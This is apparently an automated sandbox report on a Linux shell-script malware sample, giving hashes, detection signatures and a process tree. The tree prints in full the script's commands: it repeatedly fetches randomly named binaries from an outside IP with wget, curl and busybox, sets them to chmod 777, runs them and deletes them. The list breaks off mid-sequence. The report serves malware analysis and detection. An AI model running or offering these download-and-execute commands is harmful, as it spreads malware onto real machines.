Analysis
-
max time kernel
32s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
14-11-2024 02:42
Static task
static1
Behavioral task
behavioral1
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
-
Size
10KB
-
MD5
917b3d2f50ea971b48d53c43acb35304
-
SHA1
bfe50bdd2f5d3467fef4e1a330a33fa6467e3b31
-
SHA256
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918
-
SHA512
0580e33716000342d8c2cb7288ca5d23607157542b578cd1f809877f776e9cade3cf808e804987ae0904bf5e8cb440e05090f15d6a7bce6e6af8e5b1b54b1cd4
-
SSDEEP
192:ES2PBbUb8bkbfbDbjfLN2uYRPn/6GpCe6MZRrNe6MZRH7gPn/6GibUb8bkbfbDb6:ES2P2fLN2uYfCe6MZRrNe6MZRH7CfLN8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 1601 chmod 1607 chmod 1505 chmod 1583 chmod 1559 chmod 1589 chmod 1631 chmod 1523 chmod 1625 chmod 1637 chmod 1565 chmod 1571 chmod 1595 chmod 1613 chmod 1643 chmod 1657 chmod 1517 chmod 1553 chmod 1577 chmod 1619 chmod 1541 chmod 1547 chmod 1529 chmod 1535 chmod 1649 chmod 1511 chmod 1663 chmod 1669 chmod -
Executes dropped EXE 28 IoCs
Processes:
A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3mNXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J84zJEHmamaz9O6V7VhaGDFe0W865iMc59OzW87e5c6aH2F8rqb0yul6w9V18uHPCHIYBvM6yXERkrkBAzeulbmz0voJENwQXQ2ja6OGRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIzlIaAGg82Vr6GeXKmHiv4lELympxeGoFdvEUuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4SQktCevJpk5dhjkcqzqBJTvtKdorD47CMCRFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5qw5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0SQktCevJpk5dhjkcqzqBJTvtKdorD47CMCRFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5qw5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3mNXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J84zJEHmamaz9O6V7VhaGDFe0W865iMc59OzW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6OGRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIzlIaAGg82Vr6GeXKmHiv4lELympxeGoFdvEUuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNxioc pid Process /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m 1506 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J 1512 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O 1518 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB 1524 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O 1530 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz 1536 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE 1542 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx 1548 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 1554 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC 1560 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ 1566 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q 1572 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 1578 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 1584 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC 1590 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ 1596 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q 1602 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 1608 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 1614 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m 1620 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J 1626 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O 1632 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB 1638 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 1644 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O 1650 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz 1658 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE 1664 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx 1670 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 curl File opened for modification /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB curl File opened for modification /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE curl File opened for modification /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O curl File opened for modification /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 curl File opened for modification /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 curl File opened for modification /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q curl File opened for modification /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 curl File opened for modification /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 curl File opened for modification /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m curl File opened for modification /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 curl File opened for modification /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC curl File opened for modification /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC curl File opened for modification /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB curl File opened for modification /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ curl File opened for modification /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE curl File opened for modification /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J curl File opened for modification /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz curl File opened for modification /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m curl File opened for modification /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O curl File opened for modification /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx curl File opened for modification /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O curl File opened for modification /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx curl File opened for modification /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ curl File opened for modification /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J curl File opened for modification /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz curl File opened for modification /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q curl File opened for modification /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O curl
Processes
-
/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh1⤵PID:1496
-
/bin/rm/bin/rm bins.sh2⤵PID:1497
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:1498
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Writes file to tmp directory
PID:1503
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:1504
-
-
/bin/chmodchmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- File and Directory Permissions Modification
PID:1505
-
-
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Executes dropped EXE
PID:1506
-
-
/bin/rmrm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:1507
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:1508
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Writes file to tmp directory
PID:1509
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:1510
-
-
/bin/chmodchmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- File and Directory Permissions Modification
PID:1511
-
-
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Executes dropped EXE
PID:1512
-
-
/bin/rmrm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:1513
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:1514
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Writes file to tmp directory
PID:1515
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:1516
-
-
/bin/chmodchmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- File and Directory Permissions Modification
PID:1517
-
-
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Executes dropped EXE
PID:1518
-
-
/bin/rmrm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:1519
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:1520
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Writes file to tmp directory
PID:1521
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:1522
-
-
/bin/chmodchmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Executes dropped EXE
PID:1524
-
-
/bin/rmrm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:1525
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:1526
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:1528
-
-
/bin/chmodchmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:1531
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:1534
-
-
/bin/chmodchmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:1537
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:1540
-
-
/bin/chmodchmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:1543
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:1546
-
-
/bin/chmodchmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:1549
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:1550
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:1552
-
-
/bin/chmodchmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:1555
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:1558
-
-
/bin/chmodchmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:1561
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:1564
-
-
/bin/chmodchmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:1567
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:1570
-
-
/bin/chmodchmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:1573
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:1574
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:1576
-
-
/bin/chmodchmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:1579
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:1580
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:1582
-
-
/bin/chmodchmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:1585
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:1586
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:1588
-
-
/bin/chmodchmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:1591
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:1592
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:1594
-
-
/bin/chmodchmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:1597
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:1600
-
-
/bin/chmodchmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:1603
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:1604
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:1606
-
-
/bin/chmodchmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:1609
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:1610
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:1612
-
-
/bin/chmodchmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:1615
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:1618
-
-
/bin/chmodchmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:1621
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:1622
-
-
